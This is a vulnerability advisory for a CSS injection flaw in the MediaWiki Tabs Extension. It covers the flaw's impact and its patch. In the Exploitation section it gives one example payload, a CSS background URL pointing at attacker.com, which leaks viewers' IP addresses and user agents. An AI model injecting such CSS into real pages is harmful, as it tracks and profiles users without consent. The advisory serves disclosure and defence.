CVE-2025-32075

Vulnerability

Overview The MediaWiki Tabs Extension (versions 1.39 through 1.43) contains an improper input validation vulnerability in its handling of CSS values within system messages and tab container attributes. The extension fails to sanitize user-supplied CSS, allowing injection of arbitrary CSS properties that can trigger external HTTP requests [1].

Exploitation

An attacker with the ability to edit system messages (such as tabs-dropdown-bgcolor) or to create pages containing ` and tags can inject CSS that sets background URLs to attacker-controlled servers. For example, setting a container attribute like background: url(https://attacker.com/leak)` causes the browser to fetch that URL when the page is rendered, leaking the viewer's IP address and user agent string [1].

Impact

Successful exploitation allows an attacker to collect IP addresses and user agent strings of any user who views a page containing the malicious tabs. This information can be used for tracking, profiling, or further targeted attacks. The vulnerability is classified as a code injection because the injected CSS is executed in the context of the MediaWiki page [1].

Mitigation

The issue has been addressed in the extension's repository (see patch in Gerrit). Users should update to a patched version of the Tabs Extension. As of the publication date, no workaround is documented, and the vulnerability is not listed in CISA's Known Exploited Vulnerabilities catalog [1].